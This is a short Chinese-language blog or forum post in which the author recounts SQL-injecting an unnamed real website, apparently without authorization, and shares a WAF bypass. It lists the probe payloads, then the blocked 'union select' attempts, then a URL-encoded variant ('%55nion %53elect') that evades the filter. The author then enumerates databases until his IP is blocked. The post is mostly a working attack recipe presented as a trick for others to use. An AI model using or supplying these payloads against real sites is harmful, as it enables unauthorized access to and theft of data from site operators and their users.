某网站的sql注入绕过的小手法

mucn又来分享了 这网站早就记在我的小本子里了

刚刚测试了一下 发现存在注入。 但存在拦截。

然后我在这儿给大家分享一个小绕过方法。

因为刚刚电脑因为多次访问ip被拦截了（如图一） 然后手机搞非常不方便 所以我这里就只分享下怎么绕过哦。

说下前面的几步小操作

and 1=1 （页面正常不拦截）

and 1=2 （页面不正常不拦截）

order by 2 （字段为2 不拦截）

and 1=2 union select 1,2 (拦截)

and 1=2 union （拦截）-这里就判断出waf对union是存在过滤的

and 1=2 select （拦截）-同上 waf对select也存在拦截

然后思考绕过 首先改大小写

and 1=2 UnioN sEleCT （拦截）

接着思考其他绕过手法（对字母U和S进行编码）

and 1=2 %55nion %53elect 1,2 (不拦截 页面爆出字段)如图二

接着通过爆出字段进行一些信息查询 如图三

然后爆库 如图4(就两个库 一个内置库 一个当前使用库)这里要是爆表的话肯定是选择当前使用库进行查表(可惜还没爆表就ip就被拦了 后续等我ip不被拦的时候再考虑要不要继续更下去吧 )